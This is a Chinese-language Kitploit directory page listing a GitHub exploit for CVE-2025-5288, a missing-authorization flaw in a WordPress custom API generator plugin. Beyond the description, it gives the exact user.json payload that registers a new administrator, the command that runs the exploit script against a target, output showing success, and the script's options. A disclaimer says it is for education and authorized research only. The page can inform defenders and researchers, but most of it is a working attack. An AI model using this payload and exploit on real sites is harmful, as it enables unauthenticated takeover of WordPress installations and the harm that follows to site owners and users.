Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/nxploited/cve-2025-5288
身份验证与授权权限提升漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubnxploited/cve-2025-5288

CVE-2025-5288

Wordpress REST API | 跨平台与导入导出自定义API生成器 WP 1.0.0 - 2.0.3 - 缺少授权导致未经授权的权限提升

查看仓库
331年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚨 REST API | WordPress跨平台及导入导出自定义API生成器 1.0.0 - 2.0.3 - 缺少授权检查导致未认证权限提升

📋 描述

WordPress的REST API | Custom API Generator For Cross Platform And Import Export In WP插件存在权限提升漏洞,原因是process_handler()函数缺少能力检查,影响版本1.0.0到2.0.3。
这允许未认证攻击者向暴露的端点发送特制的user.json文件,并创建一个新的管理员账户。

  • CVE: CVE-2025-5288
  • CVSS评分: 9.8(严重)
  • 发布日期: 2025年6月12日
  • 最后更新: 2025年6月12日

⚙️ 脚本说明

user.json载荷格式:

root@kitploit:~
[
  {
    "author_data": {
      "post_author": "Nxploited",
      "post_author_email": "[email protected]",
      "post_author_role": "administrator"
    },
    "title": "Nxploited (Khaled_alenazi)",
    "content": "Nxploited (Khaled_alenazi)"
  }
]

🚀 利用流程:

root@kitploit:~
python3 CVE-2025-5288.py -u http://192.168.100.74:888/wordpress/ -json http://192.168.100.74:888/user.json

示例输出:

root@kitploit:~
[+] Target appears vulnerable (version: 2.0.3) - exploiting...

[*] Fetching JSON payload from: http://192.168.100.74:888/user.json
[+] JSON content loaded successfully:

    [1] {
    "author_data": {
        "post_author": "Nxploited",
        "post_author_email": "[email protected]",
        "post_author_role": "administrator"
    },
    "title": "Nxploited (Khaled_alenazi)",
    "content": "Nxploited (Khaled_alenazi)"
}

[*] Launching exploitation...

[+] Exploit delivered successfully.

[+] Payload Sent:
[
    {
        "author_data": {
            "post_author": "Nxploited",
            "post_author_email": "[email protected]",
            "post_author_role": "administrator"
        },
        "title": "Nxploited (Khaled_alenazi)",
        "content": "Nxploited (Khaled_alenazi)"
    }
]

🧰 用法

root@kitploit:~
usage: CVE-2025-5288.py [-h] -u URL -json URL_JSON [--proxy PROXY] [--timeout TIMEOUT] [--no-verify] [--no-sleep] [--debug]

未认证权限提升 - 由Khaled Alenazi (Nxploited)

选项:
  -h, --help            显示此帮助信息并退出
  -u, --url URL         WordPress站点的基本URL(例如 http://target/wp/)
  -json, --url_json URL_JSON
                        托管载荷的URL
  --proxy PROXY         代理URL(例如 http://127.0.0.1:8080)
  --timeout TIMEOUT     HTTP超时秒数(默认:10)
  --no-verify           禁用SSL证书验证(不建议!)
  --no-sleep            禁用睡眠延迟以加快执行速度
  --debug               启用调试输出
                                               

⚠️ 免责声明

此工具仅用于教育和授权的安全研究目的。未经许可擅自访问系统是违法的。


作者:Nxploited (Khaled_alenazi)

下载工具